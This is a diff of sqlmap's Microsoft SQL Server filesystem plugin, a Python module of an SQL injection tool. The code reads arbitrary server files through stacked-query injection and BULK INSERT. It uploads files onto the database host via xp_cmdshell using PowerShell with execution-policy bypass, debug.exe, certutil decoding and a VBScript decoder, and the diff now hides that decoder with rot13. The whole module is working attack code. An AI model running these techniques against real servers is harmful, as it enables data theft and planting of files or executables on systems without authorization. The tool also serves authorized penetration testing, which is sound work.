@@ -1,22 +1,26 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
 See the file 'LICENSE' for copying permission
 """
 
+import codecs
 import ntpath
 import os
 
+from lib.core.common import checkFile
 from lib.core.common import getLimitRange
 from lib.core.common import isNumPosStrValue
 from lib.core.common import isTechniqueAvailable
 from lib.core.common import posixToNtSlashes
 from lib.core.common import randomStr
 from lib.core.common import readInput
-from lib.core.convert import base64encode
-from lib.core.convert import hexencode
+from lib.core.compat import xrange
+from lib.core.convert import encodeBase64
+from lib.core.convert import encodeHex
 from lib.core.data import conf
+from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.enums import CHARSET_TYPE
 from lib.core.enums import EXPECTED
@@ -28,9 +32,6 @@ from lib.request import inject
 from plugins.generic.filesystem import Filesystem as GenericFilesystem
 
 class Filesystem(GenericFilesystem):
-    def __init__(self):
-        GenericFilesystem.__init__(self)
-
     def _dataToScr(self, fileContent, chunkName):
         fileLines = []
         fileSize = len(fileContent)
@@ -46,14 +47,14 @@ class Filesystem(GenericFilesystem):
             scrString = ""
 
             for lineChar in fileContent[fileLine:fileLine + lineLen]:
-                strLineChar = hexencode(lineChar, conf.encoding)
+                strLineChar = encodeHex(lineChar, binary=False)
 
                 if not scrString:
                     scrString = "e %x %s" % (lineAddr, strLineChar)
                 else:
                     scrString += " %s" % strLineChar
 
-                lineAddr += len(lineChar)
+                lineAddr += len(strLineChar) // 2
 
             fileLines.append(scrString)
 
@@ -83,22 +84,23 @@ class Filesystem(GenericFilesystem):
 
         return chunkName
 
-    def stackedReadFile(self, rFile):
-        infoMsg = "fetching file: '%s'" % rFile
-        logger.info(infoMsg)
+    def stackedReadFile(self, remoteFile):
+        if not kb.bruteMode:
+            infoMsg = "fetching file: '%s'" % remoteFile
+            logger.info(infoMsg)
 
         result = []
         txtTbl = self.fileTblName
-        hexTbl = "%shex" % self.fileTblName
+        hexTbl = "%s%shex" % (self.fileTblName, randomStr())
 
         self.createSupportTbl(txtTbl, self.tblField, "text")
         inject.goStacked("DROP TABLE %s" % hexTbl)
         inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)"))
 
-        logger.debug("loading the content of file '%s' into support table" % rFile)
-        inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, rFile, randomStr(10), randomStr(10)), silent=True)
+        logger.debug("loading the content of file '%s' into support table" % remoteFile)
+        inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, remoteFile, randomStr(10), randomStr(10)), silent=True)
 
-        # Reference: http://support.microsoft.com/kb/104829
+        # Reference: https://web.archive.org/web/20120211184457/http://support.microsoft.com/kb/104829
         binToHexQuery = """DECLARE @charset VARCHAR(16)
         DECLARE @counter INT
         DECLARE @hexstr VARCHAR(4096)
@@ -149,7 +151,7 @@ class Filesystem(GenericFilesystem):
 
             if not isNumPosStrValue(count):
                 errMsg = "unable to retrieve the content of the "
-                errMsg += "file '%s'" % rFile
+                errMsg += "file '%s'" % remoteFile
                 raise SqlmapNoneDataException(errMsg)
 
             indexRange = getLimitRange(count)
@@ -162,41 +164,41 @@ class Filesystem(GenericFilesystem):
 
         return result
 
-    def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False):
+    def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
         errMsg = "Microsoft SQL Server does not support file upload with "
         errMsg += "UNION query SQL injection technique"
         raise SqlmapUnsupportedFeatureException(errMsg)
 
-    def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType):
+    def _stackedWriteFilePS(self, tmpPath, localFileContent, remoteFile, fileType):
         infoMsg = "using PowerShell to write the %s file content " % fileType
-        infoMsg += "to file '%s'" % dFile
+        infoMsg += "to file '%s'" % remoteFile
         logger.info(infoMsg)
 
-        encodedFileContent = base64encode(wFileContent)
+        encodedFileContent = encodeBase64(localFileContent, binary=False)
         encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True)
         encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File)
 
         randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True)
         randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript)
 
-        wFileSize = len(encodedFileContent)
+        localFileSize = len(encodedFileContent)
         chunkMaxSize = 1024
 
         logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath)
 
-        for i in xrange(0, wFileSize, chunkMaxSize):
+        for i in xrange(0, localFileSize, chunkMaxSize):
             wEncodedChunk = encodedFileContent[i:i + chunkMaxSize]
             self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File)
 
         psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath
         psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = "
         psString += "[System.Convert]::FromBase64String($Base64); Set-Content "
-        psString += "-Path \"%s\" -Value $Content -Encoding Byte" % dFile
+        psString += "-Path \"%s\" -Value $Content -Encoding Byte" % remoteFile
 
         logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath)
         self.xpCmdshellWriteFile(psString, tmpPath, randPSScript)
 
-        logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % dFile)
+        logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % remoteFile)
 
         commands = (
             "powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath,
@@ -206,27 +208,27 @@ class Filesystem(GenericFilesystem):
 
         self.execCmd(" & ".join(command for command in commands))
 
-    def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
+    def _stackedWriteFileDebugExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType):
         infoMsg = "using debug.exe to write the %s " % fileType
-        infoMsg += "file content to file '%s', please wait.." % dFile
+        infoMsg += "file content to file '%s', please wait.." % remoteFile
         logger.info(infoMsg)
 
-        dFileName = ntpath.basename(dFile)
-        sFile = "%s\\%s" % (tmpPath, dFileName)
-        wFileSize = os.path.getsize(wFile)
+        remoteFileName = ntpath.basename(remoteFile)
+        sFile = "%s\\%s" % (tmpPath, remoteFileName)
+        localFileSize = os.path.getsize(localFile)
         debugSize = 0xFF00
 
-        if wFileSize < debugSize:
-            chunkName = self._updateDestChunk(wFileContent, tmpPath)
+        if localFileSize < debugSize:
+            chunkName = self._updateDestChunk(localFileContent, tmpPath)
 
             debugMsg = "renaming chunk file %s\\%s to %s " % (tmpPath, chunkName, fileType)
-            debugMsg += "file %s\\%s and moving it to %s" % (tmpPath, dFileName, dFile)
+            debugMsg += "file %s\\%s and moving it to %s" % (tmpPath, remoteFileName, remoteFile)
             logger.debug(debugMsg)
 
             commands = (
                 "cd \"%s\"" % tmpPath,
-                "ren %s %s" % (chunkName, dFileName),
-                "move /Y %s %s" % (dFileName, dFile)
+                "ren %s %s" % (chunkName, remoteFileName),
+                "move /Y %s %s" % (remoteFileName, remoteFile)
             )
 
             self.execCmd(" & ".join(command for command in commands))
@@ -237,18 +239,18 @@ class Filesystem(GenericFilesystem):
             debugMsg += "on the server, please wait.."
             logger.debug(debugMsg)
 
-            for i in xrange(0, wFileSize, debugSize):
-                wFileChunk = wFileContent[i:i + debugSize]
-                chunkName = self._updateDestChunk(wFileChunk, tmpPath)
+            for i in xrange(0, localFileSize, debugSize):
+                localFileChunk = localFileContent[i:i + debugSize]
+                chunkName = self._updateDestChunk(localFileChunk, tmpPath)
 
                 if i == 0:
                     debugMsg = "renaming chunk "
-                    copyCmd = "ren %s %s" % (chunkName, dFileName)
+                    copyCmd = "ren %s %s" % (chunkName, remoteFileName)
                 else:
                     debugMsg = "appending chunk "
-                    copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName)
+                    copyCmd = "copy /B /Y %s+%s %s" % (remoteFileName, chunkName, remoteFileName)
 
-                debugMsg += "%s\\%s to %s file %s\\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName)
+                debugMsg += "%s\\%s to %s file %s\\%s" % (tmpPath, chunkName, fileType, tmpPath, remoteFileName)
                 logger.debug(debugMsg)
 
                 commands = (
@@ -259,80 +261,82 @@ class Filesystem(GenericFilesystem):
 
                 self.execCmd(" & ".join(command for command in commands))
 
-            logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile))
+            logger.debug("moving %s file %s to %s" % (fileType, sFile, remoteFile))
 
             commands = (
                 "cd \"%s\"" % tmpPath,
-                "move /Y %s %s" % (dFileName, dFile)
+                "move /Y %s %s" % (remoteFileName, remoteFile)
             )
 
             self.execCmd(" & ".join(command for command in commands))
 
-    def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
+    def _stackedWriteFileVbs(self, tmpPath, localFileContent, remoteFile, fileType):
         infoMsg = "using a custom visual basic script to write the "
-        infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile)
+        infoMsg += "%s file content to file '%s', please wait.." % (fileType, remoteFile)
         logger.info(infoMsg)
 
         randVbs = "tmps%s.vbs" % randomStr(lowercase=True)
         randFile = "tmpf%s.txt" % randomStr(lowercase=True)
         randFilePath = "%s\\%s" % (tmpPath, randFile)
 
-        vbs = """Dim inputFilePath, outputFilePath
-        inputFilePath = "%s"
-        outputFilePath = "%s"
-        Set fs = CreateObject("Scripting.FileSystemObject")
-        Set file = fs.GetFile(inputFilePath)
-        If file.Size Then
-            Wscript.Echo "Loading from: " & inputFilePath
-            Wscript.Echo
-            Set fd = fs.OpenTextFile(inputFilePath, 1)
-            data = fd.ReadAll
-            fd.Close
-            data = Replace(data, " ", "")
-            data = Replace(data, vbCr, "")
-            data = Replace(data, vbLf, "")
-            Wscript.Echo "Fixed Input: "
-            Wscript.Echo data
-            Wscript.Echo
-            decodedData = base64_decode(data)
-            Wscript.Echo "Output: "
-            Wscript.Echo decodedData
-            Wscript.Echo
-            Wscript.Echo "Writing output in: " & outputFilePath
-            Wscript.Echo
-            Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile(outputFilePath, 2, True)
-            ofs.Write decodedData
-            ofs.close
-        Else
-            Wscript.Echo "The file is empty."
-        End If
-        Function base64_decode(byVal strIn)
-            Dim w1, w2, w3, w4, n, strOut
-            For n = 1 To Len(strIn) Step 4
-                w1 = mimedecode(Mid(strIn, n, 1))
-                w2 = mimedecode(Mid(strIn, n + 1, 1))
-                w3 = mimedecode(Mid(strIn, n + 2, 1))
-                w4 = mimedecode(Mid(strIn, n + 3, 1))
-                If Not w2 Then _
-                strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255))
-                If  Not w3 Then _
-                strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255))
-                If Not w4 Then _
-                strOut = strOut + Chr(((w3 * 64 + w4) And 255))
-            Next
-            base64_decode = strOut
-            End Function
-        Function mimedecode(byVal strIn)
-            Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
-            If Len(strIn) = 0 Then
-                mimedecode = -1 : Exit Function
-            Else
-                mimedecode = InStr(Base64Chars, strIn) - 1
-            End If
-        End Function""" % (randFilePath, dFile)
+        vbs = """Qvz vachgSvyrCngu, bhgchgSvyrCngu
+        vachgSvyrCngu = "%f"
+        bhgchgSvyrCngu = "%f"
+        Frg sf = PerngrBowrpg("Fpevcgvat.SvyrFlfgrzBowrpg")
+        Frg svyr = sf.TrgSvyr(vachgSvyrCngu)
+        Vs svyr.Fvmr Gura
+            Jfpevcg.Rpub "Ybnqvat sebz: " & vachgSvyrCngu
+            Jfpevcg.Rpub
+            Frg sq = sf.BcraGrkgSvyr(vachgSvyrCngu, 1)
+            qngn = sq.ErnqNyy
+            sq.Pybfr
+            qngn = Ercynpr(qngn, " ", "")
+            qngn = Ercynpr(qngn, ioPe, "")
+            qngn = Ercynpr(qngn, ioYs, "")
+            Jfpevcg.Rpub "Svkrq Vachg: "
+            Jfpevcg.Rpub qngn
+            Jfpevcg.Rpub
+            qrpbqrqQngn = onfr64_qrpbqr(qngn)
+            Jfpevcg.Rpub "Bhgchg: "
+            Jfpevcg.Rpub qrpbqrqQngn
+            Jfpevcg.Rpub
+            Jfpevcg.Rpub "Jevgvat bhgchg va: " & bhgchgSvyrCngu
+            Jfpevcg.Rpub
+            Frg bsf = PerngrBowrpg("Fpevcgvat.SvyrFlfgrzBowrpg").BcraGrkgSvyr(bhgchgSvyrCngu, 2, Gehr)
+            bsf.Jevgr qrpbqrqQngn
+            bsf.pybfr
+        Ryfr
+            Jfpevcg.Rpub "Gur svyr vf rzcgl."
+        Raq Vs
+        Shapgvba onfr64_qrpbqr(olIny fgeVa)
+            Qvz j1, j2, j3, j4, a, fgeBhg
+            Sbe a = 1 Gb Yra(fgeVa) Fgrc 4
+                j1 = zvzrqrpbqr(Zvq(fgeVa, a, 1))
+                j2 = zvzrqrpbqr(Zvq(fgeVa, a + 1, 1))
+                j3 = zvzrqrpbqr(Zvq(fgeVa, a + 2, 1))
+                j4 = zvzrqrpbqr(Zvq(fgeVa, a + 3, 1))
+                Vs Abg j2 Gura _
+                fgeBhg = fgeBhg + Pue(((j1 * 4 + Vag(j2 / 16)) Naq 255))
+                Vs  Abg j3 Gura _
+                fgeBhg = fgeBhg + Pue(((j2 * 16 + Vag(j3 / 4)) Naq 255))
+                Vs Abg j4 Gura _
+                fgeBhg = fgeBhg + Pue(((j3 * 64 + j4) Naq 255))
+            Arkg
+            onfr64_qrpbqr = fgeBhg
+            Raq Shapgvba
+        Shapgvba zvzrqrpbqr(olIny fgeVa)
+            Onfr64Punef = "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm0123456789+/"
+            Vs Yra(fgeVa) = 0 Gura
+                zvzrqrpbqr = -1 : Rkvg Shapgvba
+            Ryfr
+                zvzrqrpbqr = VaFge(Onfr64Punef, fgeVa) - 1
+            Raq Vs
+        Raq Shapgvba"""
 
+        # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5581
+        vbs = codecs.decode(vbs, "rot13")
         vbs = vbs.replace("    ", "")
-        encodedFileContent = base64encode(wFileContent)
+        encodedFileContent = encodeBase64(localFileContent, binary=False)
 
         logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
 
@@ -351,9 +355,9 @@ class Filesystem(GenericFilesystem):
 
         self.execCmd(" & ".join(command for command in commands))
 
-    def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
+    def _stackedWriteFileCertutilExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType):
         infoMsg = "using certutil.exe to write the %s " % fileType
-        infoMsg += "file content to file '%s', please wait.." % dFile
+        infoMsg += "file content to file '%s', please wait.." % remoteFile
         logger.info(infoMsg)
 
         chunkMaxSize = 500
@@ -361,7 +365,7 @@ class Filesystem(GenericFilesystem):
         randFile = "tmpf%s.txt" % randomStr(lowercase=True)
         randFilePath = "%s\\%s" % (tmpPath, randFile)
 
-        encodedFileContent = base64encode(wFileContent)
+        encodedFileContent = encodeBase64(localFileContent, binary=False)
 
         splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])
 
@@ -369,54 +373,54 @@ class Filesystem(GenericFilesystem):
 
         self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile)
 
-        logger.debug("decoding the file to %s.." % dFile)
+        logger.debug("decoding the file to %s.." % remoteFile)
 
         commands = (
             "cd \"%s\"" % tmpPath,
-            "certutil -f -decode %s %s" % (randFile, dFile),
+            "certutil -f -decode %s %s" % (randFile, remoteFile),
             "del /F /Q %s" % randFile
         )
 
         self.execCmd(" & ".join(command for command in commands))
 
-    def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
+    def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
         # NOTE: this is needed here because we use xp_cmdshell extended
         # procedure to write a file on the back-end Microsoft SQL Server
         # file system
         self.initEnv()
-
         self.getRemoteTempPath()
 
         tmpPath = posixToNtSlashes(conf.tmpPath)
-        dFile = posixToNtSlashes(dFile)
-        with open(wFile, "rb") as f:
-            wFileContent = f.read()
+        remoteFile = posixToNtSlashes(remoteFile)
 
-        self._stackedWriteFilePS(tmpPath, wFileContent, dFile, fileType)
-        written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
+        checkFile(localFile)
+        localFileContent = open(localFile, "rb").read()
+
+        self._stackedWriteFilePS(tmpPath, localFileContent, remoteFile, fileType)
+        written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
 
         if written is False:
             message = "do you want to try to upload the file with "
             message += "the custom Visual Basic script technique? [Y/n] "
 
             if readInput(message, default='Y', boolean=True):
-                self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType)
-                written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
+                self._stackedWriteFileVbs(tmpPath, localFileContent, remoteFile, fileType)
+                written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
 
         if written is False:
             message = "do you want to try to upload the file with "
             message += "the built-in debug.exe technique? [Y/n] "
 
             if readInput(message, default='Y', boolean=True):
-                self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType)
-                written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
+                self._stackedWriteFileDebugExe(tmpPath, localFile, localFileContent, remoteFile, fileType)
+                written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
 
         if written is False:
             message = "do you want to try to upload the file with "
             message += "the built-in certutil.exe technique? [Y/n] "
 
             if readInput(message, default='Y', boolean=True):
-                self._stackedWriteFileCertutilExe(tmpPath, wFile, wFileContent, dFile, fileType)
-                written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
+                self._stackedWriteFileCertutilExe(tmpPath, localFile, localFileContent, remoteFile, fileType)
+                written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
 
         return written
